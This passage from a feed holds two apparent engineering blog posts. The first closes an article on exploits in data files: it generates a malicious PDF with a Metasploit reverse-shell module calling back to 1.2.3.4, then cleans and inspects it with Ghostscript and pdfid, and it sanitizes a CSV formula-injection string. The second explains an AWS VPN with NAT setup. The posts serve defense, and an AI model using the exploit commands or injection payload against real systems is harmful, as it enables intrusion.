&lt;p&gt;This module embeds a Metasploit payload into an existing PDF file in a non-standard method. The resulting PDF can be sent to a target as part of a social engineering attack. [It] does not require JavaScript to be enabled and ... [the] EXE is embedded in the PDF in a non-standard method using HEX encoding.  Target: Adobe Reader &amp;lt;= v9.3.3 (Windows XP SP3 English)&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Although this particular exploit does not work against current versions of PDF readers, the approach can be reused in future exploits. In addition, Metasploit has other PDF exploits:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;gt; search type:exploit platform:windows name:pdf
... exploit/windows/fileformat/foxit_reader_uaf   ...   2018-04-20
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A possible defense against PDF exploits is to preprocess all untrusted PDF files and strip everything but the static content inside them. This can be accomplished with the following Ghostscript command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ gs -dNOPAUSE -dBATCH -sDEVICE=pdfwrite -sOUTPUTFILE=clean.pdf original.pdf
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Note that this does not rasterize the pages, so copyable text inside the PDF remains copyable. A discussion on Information Security Stack Exchange &lt;a href="https://security.stackexchange.com/questions/103323/effectiveness-of-flattening-a-pdf-to-remove-malware"&gt;suggests&lt;/a&gt; adding options to downsample embedded images in order to remove exploits that target flaws in image processing libraries.&lt;/p&gt;

&lt;p&gt;A simple text search inside the PDF file would not find all suspicious active components, because attackers obfuscate them. Instead, you can use Didier's &lt;code&gt;pdfid&lt;/code&gt; tool to triage PDF documents and his &lt;code&gt;pdf-parser&lt;/code&gt; tool to analyze the suspicious ones.&lt;/p&gt;
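&lt;p&gt;One reason plain text search falls short is that PDF names may spell characters as &lt;code&gt;#xx&lt;/code&gt; hex escapes, so &lt;code&gt;/Launch&lt;/code&gt; can appear in a file as &lt;code&gt;/L#61unch&lt;/code&gt;. The sketch below is a simplified illustration of that idea, not a replacement for pdfid: it decodes such escapes before counting a few of the keywords pdfid reports. It ignores compressed object streams and other obfuscation, and its name pattern is deliberately simplified:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;import re

# A few of the keywords that pdfid reports as signs of active content.
KEYWORDS = [b"/JS", b"/JavaScript", b"/AA", b"/OpenAction", b"/Launch",
            b"/EmbeddedFile", b"/AcroForm", b"/RichMedia", b"/XFA"]

# Simplified PDF name token: a slash followed by name characters, where
# "#xx" stands for the byte with hexadecimal value xx.
NAME = re.compile(rb"/[\w#.+-]+")
HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")


def decode_name(raw: bytes) -> bytes:
    """Replace #xx escapes in a PDF name with the bytes they encode."""
    return HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), raw)


def count_keywords(data: bytes) -> dict:
    """Count keyword occurrences in raw PDF bytes, including hex-escaped ones."""
    counts = dict.fromkeys(KEYWORDS, 0)
    for match in NAME.finditer(data):
        name = decode_name(match.group())
        if name in counts:
            counts[name] += 1
    return counts


sample = b"1 0 obj /Type /Catalog /OpenAction 2 0 R /L#61unch 3 0 R endobj"
print(count_keywords(sample)[b"/Launch"])  # 1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;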

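&lt;p&gt;The following example generates a malicious PDF with Metasploit, neutralizes it with Ghostscript, and compares the two files with &lt;code&gt;pdfid&lt;/code&gt;. In pdfid's output, a count such as &lt;code&gt;1(1)&lt;/code&gt; means one occurrence, of which one was obfuscated with hex escapes. The &lt;code&gt;/OpenAction&lt;/code&gt; and &lt;code&gt;/Launch&lt;/code&gt; entries disappear from the cleaned file:&lt;br&gt;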
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ msfconsole
msf6 &amp;gt; use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe_nojs) &amp;gt; set lhost 1.2.3.4
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe_nojs) &amp;gt; set filename malicious.pdf
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe_nojs) &amp;gt; exploit
...
$ gs -dNOPAUSE -dBATCH -sDEVICE=pdfwrite -sOUTPUTFILE=clean.pdf malicious.pdf
$ python pdfid.py malicious.pdf &amp;gt; malicious.txt
$ python pdfid.py clean.pdf &amp;gt; clean.txt
$ diff --width 80 --side-by-side malicious.txt clean.txt
PDFiD 0.2.7 malicious.pdf             | PDFiD 0.2.7 clean.pdf
 PDF Header: %PDF-1.5                 |  PDF Header: %PDF-1.7
 obj                    5             |  obj                    7
 endobj                 5             |  endobj                 7
 stream                 0             |  stream                 2
 endstream              0             |  endstream              1
 xref                   1                xref                   1
 trailer                1                trailer                1
 startxref              1                startxref              1
 /Page                  1(1)          |  /Page                  1
 /Encrypt               0                /Encrypt               0
 /ObjStm                0                /ObjStm                0
 /JS                    0                /JS                    0
 /JavaScript            0                /JavaScript            0
 /AA                    0                /AA                    0
 /OpenAction            1(1)          |  /OpenAction            0
 /AcroForm              0                /AcroForm              0
 /JBIG2Decode           0                /JBIG2Decode           0
 /RichMedia             0                /RichMedia             0
 /Launch                1(1)          |  /Launch                0
 /EmbeddedFile          0                /EmbeddedFile          0
 /XFA                   0                /XFA                   0
 /Colors &amp;gt; 2^24         0                /Colors &amp;gt; 2^24         0
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Final Thoughts
&lt;/h2&gt;

&lt;p&gt;We have seen that the attack surface of data processing libraries differs from the attack surface of data viewing applications. There is a fundamental difference between data for machines and data for people. We have also seen that if the attacker can fully control the data file creation, then he can cause much more damage.&lt;/p&gt;

&lt;p&gt;When working with data received from a third party it is not known how well the third party checks data submitted by its users. The first step to protect yourself from exploits is to drop superfluous elements from a third party's data during the transformation stage of the ETL process. For instance, if fields titled "Description" and "Street Address" are not needed, then they can be filtered out on import.&lt;/p&gt;

&lt;p&gt;Filter out unnecessary characters from fields. A street address does not need to have &lt;code&gt;=, +, @&lt;/code&gt; characters, and most data values never need to &lt;em&gt;begin&lt;/em&gt; with those characters. When exporting data from your own database into CSV and PDF reports for manual viewing, simplify the data by removing all unusual characters since the report need not have data in the precise original form. &lt;/p&gt;
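&lt;p&gt;As an illustration of such filtering, the sketch below cleans a street-address field with an allow-list of characters. The allowed set (letters, digits, spaces, and &lt;code&gt;. , # ' / -&lt;/code&gt;) is an assumption about what addresses in your data look like, and the function name is hypothetical:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;import re

# Hypothetical allow-list: letters, digits, spaces and a little punctuation.
DISALLOWED = re.compile(r"[^\w .,#'/-]")


def clean_street_address(value: str) -> str:
    """Drop characters an address does not need, plus any leading dash."""
    cleaned = DISALLOWED.sub("", value).strip()
    # "-" is allowed inside an address ("12-14 Elm St") but not at the start,
    # where a spreadsheet could read it as a formula.
    return cleaned.lstrip("-").strip()


print(clean_street_address("123 Main St., Apt #4"))  # 123 Main St., Apt #4
print(clean_street_address("=cmd|' /C calc'!A0"))    # cmd' /C calc'A0
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;An allow-list is easier to reason about than a block-list: anything the address format does not need is removed, including characters nobody thought to list.&lt;/p&gt;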

&lt;p&gt;Anonymize datasets to remove Personally Identifiable Information (PII). This further reduces the attack surface, because any user-submitted values are replaced by anonymized equivalents.&lt;/p&gt;
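&lt;p&gt;One common approach, sketched below, replaces identifying fields with keyed hashes (HMAC-SHA256). Strictly speaking this is pseudonymization: anyone holding the key can hash a guessed value and match it, so the key must be stored separately from the data. The field names and the 16-character truncation are assumptions. A side benefit is that the hex tokens never begin with &lt;code&gt;=, +, -, @&lt;/code&gt;:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;import hashlib
import hmac

# Hypothetical names of fields that carry user-submitted personal data.
PII_FIELDS = {"first_name", "last_name", "street_address"}


def pseudonymize(record: dict, key: bytes, fields=PII_FIELDS) -> dict:
    """Return a copy of record with PII fields replaced by keyed hashes."""
    out = dict(record)
    for field in fields.intersection(record):
        digest = hmac.new(key, str(record[field]).encode("utf-8"), hashlib.sha256)
        # The same input always maps to the same token, so joins still work.
        out[field] = digest.hexdigest()[:16]
    return out


row = {"date": "2020-07-25", "first_name": "=2+5", "last_name": "Math"}
print(pseudonymize(row, key=b"keep-this-secret"))
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;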

&lt;p&gt;Finally, use virtual machines when opening unsafe files. VirtualBox or remote instances on Amazon AWS can be used for working with unsafe data files; as of 2021, AWS supports both Windows and macOS virtual workstations. Running ETL jobs in Docker containers also makes it harder for exploits to reach the underlying operating system.&lt;/p&gt;

&lt;p&gt;At Smarking, we ingest millions of records from parking vendors, and we use such techniques to fend off exploits.&lt;/p&gt;

&lt;h2&gt;
  
  
  Additional Reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;[Mauer] "The Absurdly Underestimated Dangers of CSV Injection," George Mauer, 2017 (&lt;a href="http://georgemauer.net/2017/10/07/csv-injection.html"&gt;link&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;OWASP, "XML Security Cheat Sheet" (&lt;a href="https://cheatsheetseries.owasp.org/cheatsheets/XML_Security_Cheat_Sheet.html"&gt;link&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;[Bechler] "Java Unmarshaller Security: Turning your data into code execution," Moritz Bechler, 2017&lt;/li&gt;
&lt;/ul&gt;

</description>
    </item>
    <item>
      <title>AWS Site-to-Site VPN with NAT</title>
      <dc:creator>Smarking</dc:creator>
      <pubDate>Fri, 22 Jan 2021 05:18:28 +0000</pubDate>
      <link>https://dev.to/smarkinginc/aws-site-to-site-vpn-with-nat-3if</link>
      <guid>https://dev.to/smarkinginc/aws-site-to-site-vpn-with-nat-3if</guid>
      <description>&lt;p&gt;At Smarking, we use the Amazon Web Services (AWS) infrastructure. We help organizations improve the efficiency of parking lots, and to do that we need to communicate with their computing systems. However, these organizations, which include hospitals and universities, often run closed private networks. Outside vendors like us may access those networks only through an IPSec-based VPN.&lt;/p&gt;

&lt;p&gt;Is it possible to create an IPsec tunnel from an AWS Virtual Private Cloud (VPC) to a network outside of AWS?  The use case that AWS supports well is connecting your &lt;em&gt;own&lt;/em&gt; on-premises network with the VPC. Thus, in naming components, AWS uses the term "Customer Network" to designate your on-premises network. You are the &lt;em&gt;customer&lt;/em&gt; of AWS. &lt;/p&gt;

&lt;p&gt;Also, because you are the administrator of your on-premises network, AWS does not expose extensive logs that would allow you to troubleshoot the establishment of the IPsec tunnel. Instead, AWS assumes that you can inspect the logs on the on-premises side of the connection.&lt;/p&gt;

&lt;p&gt;But what if you wish to create an IPsec tunnel from your VPC to a third-party network, one that is beyond your administrative control? In particular, you may not control the CIDR policy of the third-party network. A third party may require that you place your network on a specific CIDR, or that you use publicly addressable IP addresses.&lt;/p&gt;

&lt;p&gt;In order to support creating IPSec tunnels, AWS offered, for many years, a specialized solution called a Virtual Private Network (VPN). In recent years, it supplemented it with a generic solution called a Transit Gateway (TGW). The VPN solution requires that the customer's network doesn't conflict with your CIDR. Unless you are willing to change the IP addresses inside your VPC to match the requirement, then you need to use Network Address Translation (NAT). This can be accomplished by creative use of the Transit Gateway (TGW). &lt;/p&gt;

&lt;p&gt;Below is the network layout that illustrates the key idea. Assume that the AWS VPC has the subnet &lt;code&gt;20.0.0.0/16&lt;/code&gt;, the customer's network is on the &lt;code&gt;172.31.0.0/16&lt;/code&gt; subnet, and the customer wants us to use a public IP subnet. (We use AWS's terminology of "customer" to refer to the third party.) Instead of using a public IP subnet, however, we will use NAT to map all EC2 instances to the single Elastic IP address &lt;code&gt;1.2.3.4&lt;/code&gt;. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fujzgzcx2c7afavdwviei.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fujzgzcx2c7afavdwviei.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Inside our VPC we create a subnet &lt;code&gt;20.0.6.0/24&lt;/code&gt; whose sole purpose is to contain a NAT gateway EC2 instance ("NAT GW" in the diagram) that performs the NAT operation. Note that AWS has a built-in component called "NAT gateway," but here we run our own EC2 instance that performs this function using Linux and the &lt;code&gt;iptables&lt;/code&gt; packet filter. &lt;/p&gt;

&lt;p&gt;The rest of the EC2 instances in our VPC live in separate subnets. The routing tables in those subnets forward packets that are destined to the customer's side to the Elastic Network Interface (ENI) of the NAT gateway instance. &lt;/p&gt;

&lt;p&gt;The subnet in which the NAT gateway lives has a routing table that forwards packets destined for the customer to the Transit Gateway. By this time, however, the source address of these packets is the public IP &lt;code&gt;1.2.3.4&lt;/code&gt;, because they have now been NAT-translated. Unlike the more basic Virtual Private Network AWS component, the Transit Gateway AWS component places no restrictions on the source address of the packet.&lt;/p&gt;

&lt;p&gt;The Transit Gateway has a routing table that tells it where to send the packets next. Packets destined for the customer's side are forwarded to the "Site-to-Site VPN" AWS component. This is the component that holds all the IPsec tunnel options; in particular, it lists the endpoint IPs on the AWS side and on the customer's side. Note that AWS only lets you specify the endpoint IP on the customer's side and automatically picks a public IP on its own side. (We have no control over this IP address.)&lt;/p&gt;

&lt;p&gt;If the Site-to-Site VPN component can establish the IPsec connection, then upon receiving packets from the Transit Gateway, it forwards them through the tunnel. The customer sees &lt;code&gt;1.2.3.4&lt;/code&gt; as the source IP of the packets, and the customer's routing table sends packets destined for &lt;code&gt;1.2.3.4&lt;/code&gt; back into the tunnel.&lt;/p&gt;
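
&lt;p&gt;Each hop in this forward path is a route lookup that picks the most specific (longest-prefix) matching entry. The Python sketch below is a toy model under stated assumptions, not AWS code: the route tables mirror the diagram, and next-hop labels such as &lt;code&gt;nat-instance-eni&lt;/code&gt; and &lt;code&gt;site-to-site-vpn-attachment&lt;/code&gt; are hypothetical stand-ins for real ENI and attachment IDs.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;
import ipaddress

# Toy route tables that mirror the diagram. The next-hop labels are
# hypothetical placeholders, not real AWS resource IDs.
APP_SUBNET_ROUTES = {
    "20.0.0.0/16": "local",
    "172.31.0.0/16": "nat-instance-eni",
}
NAT_SUBNET_ROUTES = {
    "20.0.0.0/16": "local",
    "172.31.0.0/16": "transit-gateway",
    "1.2.3.4/32": "nat-instance-eni",
}
TGW_ROUTES = {
    "172.31.0.0/16": "site-to-site-vpn-attachment",
    "1.2.3.4/32": "nat-subnet-vpc-attachment",
}


def lookup(routes, destination):
    """Return the next hop for destination using longest-prefix match."""
    address = ipaddress.ip_address(destination)
    candidates = [ipaddress.ip_network(cidr) for cidr in routes]
    matches = [net for net in candidates if address in net]
    if not matches:
        raise LookupError("no route to " + destination)
    # The most specific route (largest prefix length) wins
    best = max(matches, key=lambda net: net.prefixlen)
    return routes[str(best)]


# Outbound: a packet from 20.0.5.210 to the customer's 172.31.38.197
print(lookup(APP_SUBNET_ROUTES, "172.31.38.197"))  # nat-instance-eni
print(lookup(NAT_SUBNET_ROUTES, "172.31.38.197"))  # transit-gateway
print(lookup(TGW_ROUTES, "172.31.38.197"))         # site-to-site-vpn-attachment
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Applying the same &lt;code&gt;lookup()&lt;/code&gt; to &lt;code&gt;1.2.3.4&lt;/code&gt; against &lt;code&gt;TGW_ROUTES&lt;/code&gt; and &lt;code&gt;NAT_SUBNET_ROUTES&lt;/code&gt; traces the return path described next.&lt;/p&gt;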

&lt;h2&gt;
  
  
  Returning Packets
&lt;/h2&gt;

&lt;p&gt;So far we have discussed how packets originating at a test EC2 instance in our VPC make their way to the customer's side. Now let's follow the process in the opposite direction. Once the Site-to-Site VPN connection receives a packet destined for the &lt;code&gt;1.2.3.4&lt;/code&gt; IP address, it forwards it to the Transit Gateway (TGW). The TGW's routing table tells it to forward such packets to the &lt;em&gt;particular subnet&lt;/em&gt; inside the VPC where the NAT GW instance runs. &lt;/p&gt;

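&lt;p&gt;Once the packet arrives in that subnet, a specific entry in the subnet's routing table tells the subnet's router to forward the packet to the Elastic Network Interface (ENI) of the NAT gateway instance. The NAT instance picks up the packet and de-NATs its destination back into the &lt;code&gt;20.0.0.0/16&lt;/code&gt; address space: Linux connection tracking remembers which private address each SNAT-ed flow came from, so replies are translated back automatically. (The explicit DNAT rule in the configuration below matters only for connections initiated from the customer's side.) The NAT instance then dispatches the modified packet, and AWS forwards it to the test EC2 instance. &lt;/p&gt;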
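
&lt;p&gt;The de-NAT step relies on state that the NAT instance keeps for each outgoing flow. The following toy Python model illustrates that bookkeeping; it is a simplification, not how the Linux kernel implements connection tracking. The class name &lt;code&gt;ToyNat&lt;/code&gt; is hypothetical, and &lt;code&gt;flow_id&lt;/code&gt; stands in for the ICMP identifier or the TCP/UDP ports.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;
class ToyNat:
    """Toy model of stateful source NAT, roughly what Linux conntrack does.

    Flows are keyed by (remote address, flow_id). Real conntrack keys on the
    full connection tuple and can also rewrite ports to avoid collisions;
    this sketch does neither.
    """

    def __init__(self, public_ip):
        self.public_ip = public_ip
        self.flows = {}  # (remote_ip, flow_id) maps to the original private source

    def outbound(self, src, dst, flow_id):
        """SNAT: replace the private source with the shared public address."""
        self.flows[(dst, flow_id)] = src
        return (self.public_ip, dst, flow_id)

    def inbound(self, src, dst, flow_id):
        """De-NAT a reply addressed to the public address."""
        if dst != self.public_ip:
            return (src, dst, flow_id)  # not addressed to the NAT, pass through
        original = self.flows.get((src, flow_id))
        if original is None:
            # Unsolicited traffic; in the real setup the PREROUTING DNAT rule decides
            raise LookupError("no tracked flow for this packet")
        return (src, original, flow_id)


nat = ToyNat("1.2.3.4")
print(nat.outbound("20.0.5.210", "172.31.38.197", 1))  # ('1.2.3.4', '172.31.38.197', 1)
print(nat.inbound("172.31.38.197", "1.2.3.4", 1))      # ('172.31.38.197', '20.0.5.210', 1)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;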

&lt;h2&gt;
  
  
  Configuration of the Linux NAT instance
&lt;/h2&gt;

&lt;p&gt;For the NAT gateway instance to pick up packets that do not carry its IP address as their destination, AWS must be told to disable the "source/destination check." This can be done in the AWS Console's EC2 "Instances" view: right-click the instance to bring up a popup menu, then select "Networking" → "Change source destination check" and disable the check. (The AWS CLI equivalent is &lt;code&gt;aws ec2 modify-instance-attribute --instance-id INSTANCE_ID --no-source-dest-check&lt;/code&gt;, where &lt;code&gt;INSTANCE_ID&lt;/code&gt; is a placeholder.)&lt;/p&gt;

&lt;p&gt;We must also enable packet forwarding in the Linux kernel with this command (run as root; the setting does not persist across reboots):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

$ echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Assuming that the private IP address of the NAT instance is &lt;code&gt;20.0.6.195&lt;/code&gt;, these &lt;code&gt;iptables&lt;/code&gt; commands set up the NAT operation:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

$ iptables -t nat -F
$ iptables -t nat -A POSTROUTING -d 172.31.0.0/16   -j SNAT --to-source 1.2.3.4
$ iptables -t nat -A PREROUTING  -d 1.2.3.4 -j DNAT --to-destination 20.0.6.195


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;To handle additional customer networks, we can add more SNAT rules. For example, for a customer network with CIDR &lt;code&gt;192.168.0.0/16&lt;/code&gt;, we would add this rule:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

$ iptables -t nat -A POSTROUTING -d 192.168.0.0/16   -j SNAT --to-source 1.2.3.4


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;If another customer wanted to see our instances coming from a different address space, we would also add DNAT rules. For example, if a customer on network &lt;code&gt;10.0.0.0/16&lt;/code&gt; wanted our traffic to appear to come from &lt;code&gt;10.1.0.0/16&lt;/code&gt;, we could (a) SNAT all outgoing packets to an address in that CIDR, for instance &lt;code&gt;10.1.0.1&lt;/code&gt;, and (b) DNAT packets arriving for &lt;code&gt;10.1.0.1&lt;/code&gt; back to &lt;code&gt;20.0.6.195&lt;/code&gt;:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

$ iptables -t nat -A POSTROUTING -d 10.0.0.0/16   -j SNAT --to-source 10.1.0.1
$ iptables -t nat -A PREROUTING  -d 10.1.0.1 -j DNAT --to-destination 20.0.6.195


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;(In addition to updating the NAT rules, we would also need to update the AWS infrastructure as shown in the diagram: add entries to the subnet routing tables, create additional Site-to-Site VPN connections, and associate them with the Transit Gateway.)&lt;/p&gt;
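
&lt;p&gt;The rules above follow a simple pattern: one SNAT rule per customer CIDR and one DNAT rule per address that we present to customers. A small Python helper can generate them from a table of mappings. The function &lt;code&gt;nat_rules()&lt;/code&gt; and its input format are hypothetical, introduced here for illustration; its output is meant to be reviewed and then run as root on the NAT instance.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;
import ipaddress


def nat_rules(private_ip, mappings, protocol=None):
    """Build iptables NAT commands for the custom NAT instance.

    private_ip: the NAT instance's own private address, e.g. 20.0.6.195.
    mappings:   list of (customer_cidr, presented_ip) pairs, where presented_ip
                is the address that customer should see our traffic come from.
    protocol:   optional protocol, e.g. "icmp", to restrict the DNAT rules.
    """
    ipaddress.ip_address(private_ip)  # fail early on a typo
    rules = ["iptables -t nat -F"]
    presented = []
    for customer_cidr, presented_ip in mappings:
        ipaddress.ip_network(customer_cidr)
        ipaddress.ip_address(presented_ip)
        rules.append("iptables -t nat -A POSTROUTING -d %s -j SNAT --to-source %s"
                     % (customer_cidr, presented_ip))
        if presented_ip not in presented:
            presented.append(presented_ip)
    proto = " -p %s" % protocol if protocol else ""
    # One DNAT rule per presented address, pointing back at the NAT instance
    for presented_ip in presented:
        rules.append("iptables -t nat -A PREROUTING -d %s%s -j DNAT --to-destination %s"
                     % (presented_ip, proto, private_ip))
    return rules


for rule in nat_rules("20.0.6.195", [
        ("172.31.0.0/16", "1.2.3.4"),
        ("192.168.0.0/16", "1.2.3.4"),
        ("10.0.0.0/16", "10.1.0.1"),
]):
    print(rule)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Passing &lt;code&gt;protocol="icmp"&lt;/code&gt; produces an ICMP-only DNAT rule of the kind discussed under Security Considerations.&lt;/p&gt;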

&lt;h2&gt;
  
  
  Testing
&lt;/h2&gt;

&lt;p&gt;We can test our setup by simulating a customer network with a StrongSwan Linux VPN, following an &lt;a href="https://aws.amazon.com/blogs/networking-and-content-delivery/simulating-site-to-site-vpn-customer-gateways-strongswan/" rel="noopener noreferrer"&gt;AWS tutorial&lt;/a&gt;. We create another VPC to represent the customer's side and set its CIDR to &lt;code&gt;172.31.0.0/16&lt;/code&gt;. Then we follow the tutorial to create a StrongSwan Linux instance in it. We create another test EC2 instance in the same VPC and configure the VPC's routing table to forward packets destined for &lt;code&gt;20.0.0.0/16&lt;/code&gt; to the Elastic Network Interface (ENI) of the StrongSwan instance. We also assign a public IP to the StrongSwan instance. &lt;/p&gt;

&lt;p&gt;Returning to our main VPC, we create a Site-to-Site VPN connection and set the public IP of the StrongSwan instance as the customer gateway's IP address. We fill in the rest of the configuration as the tutorial advises, and wait until the first tunnel shows the &lt;code&gt;UP&lt;/code&gt; state.&lt;/p&gt;

&lt;p&gt;The tutorial advises using the Border Gateway Protocol (BGP) when creating a Site-to-Site VPN connection. Once the tunnel is up, the StrongSwan instance automatically learns a route to the &lt;code&gt;20.0.0.0/16&lt;/code&gt; subnet through BGP. However, our packets arrive with &lt;code&gt;1.2.3.4&lt;/code&gt; as their source address, so the BGP-learned routes do not tell the StrongSwan instance where to send the returning packets. To fix this, we connect to the StrongSwan instance and add a static route to &lt;code&gt;/etc/quagga/zebra.conf&lt;/code&gt;, the configuration file of Quagga's Zebra routing daemon:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

ip route 1.2.3.4/32 169.254.152.245


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Then we restart Zebra with the &lt;code&gt;service zebra restart&lt;/code&gt; command. Note that the IP address &lt;code&gt;169.254.152.245&lt;/code&gt; in the configuration line above is the "Inside IP Address" of the Virtual Private Gateway for one of the two IPsec tunnels that the Site-to-Site VPN connection created. Your address will differ; you can look it up in the Generic Configuration text file, which can be downloaded from the Site-to-Site VPN Connection screen of the AWS console. &lt;/p&gt;
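
&lt;p&gt;Each tunnel's inside addresses come from a /30 block, which has exactly two usable addresses. Assuming, as in the example above, that the AWS side takes the first usable address and the customer gateway the second (check this against your own Generic Configuration file), the Zebra static route can be derived from the tunnel's inside CIDR. The helper names below are hypothetical; &lt;code&gt;aws ec2 describe-vpn-connections&lt;/code&gt; also reports each tunnel's inside CIDR in a &lt;code&gt;TunnelInsideCidr&lt;/code&gt; field.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;
import ipaddress


def inside_addresses(tunnel_inside_cidr):
    """Split a tunnel's /30 inside CIDR into (aws_side, customer_side) addresses.

    Assumption: AWS takes the first usable address and the customer gateway
    the second, as in the 169.254.152.245 example; confirm this against the
    Generic Configuration file of your own connection.
    """
    network = ipaddress.ip_network(tunnel_inside_cidr)
    if network.prefixlen != 30:
        raise ValueError("expected a /30 tunnel inside CIDR")
    aws_side, customer_side = list(network.hosts())
    return str(aws_side), str(customer_side)


def zebra_static_route(nat_ip, tunnel_inside_cidr):
    """Build the zebra.conf line that sends traffic for nat_ip into the tunnel."""
    aws_side, _ = inside_addresses(tunnel_inside_cidr)
    return "ip route %s/32 %s" % (nat_ip, aws_side)


print(zebra_static_route("1.2.3.4", "169.254.152.244/30"))
# prints: ip route 1.2.3.4/32 169.254.152.245
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;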

&lt;p&gt;Next, we connect to the test EC2 instance in the &lt;code&gt;20.0.5.0/24&lt;/code&gt; subnet and ping the test instance in the customer's &lt;code&gt;172.31.0.0/16&lt;/code&gt; subnet:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

[ec2-user@ip-20-0-5-210 ~]$ ping 172.31.38.197  &amp;gt; /dev/null &amp;amp; sudo tcpdump -eni any icmp
15:49:14.787108 Out ... 20.0.5.210 &amp;gt; 172.31.38.197: ICMP echo request, ...
15:49:14.854690  In ... 172.31.38.197 &amp;gt; 20.0.5.210: ICMP echo reply ...


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

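&lt;p&gt;We can also watch traffic from the customer's side arriving at the NAT gateway instance. Here the customer's test instance pings the NAT address &lt;code&gt;1.2.3.4&lt;/code&gt;, and the NAT gateway replies:&lt;/p&gt;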

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

ec2-user@ip-20-0-6-20:~$ sudo tcpdump -eni any icmp
20:39:46.084613  In … 172.31.38.197 &amp;gt; 1.2.3.4: ICMP echo request, id 26627, seq 1 ...
20:39:46.084657 Out … 1.2.3.4 &amp;gt; 172.31.38.197: ICMP echo reply, id 26627, seq 1 ...


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

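&lt;p&gt;The following AWS CLI commands are helpful for inspecting the setup. The first prints the configuration of every Site-to-Site VPN connection, including all tunnel parameters and, in particular, the secret pre-shared keys (PSKs), so treat its output as sensitive; the other two list the Transit Gateways and their attachments.  &lt;/p&gt;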

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

$ aws ec2 describe-vpn-connections
$ aws ec2 describe-transit-gateways
$ aws ec2 describe-transit-gateway-attachments


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
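
&lt;p&gt;Because the output of &lt;code&gt;describe-vpn-connections&lt;/code&gt; embeds the pre-shared keys, it can be safer to extract only the fields you need. The Python sketch below, with hypothetical function names and made-up sample data, reads the per-tunnel &lt;code&gt;VgwTelemetry&lt;/code&gt; entries (outside IP and &lt;code&gt;UP&lt;/code&gt;/&lt;code&gt;DOWN&lt;/code&gt; status) and ignores everything else.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;
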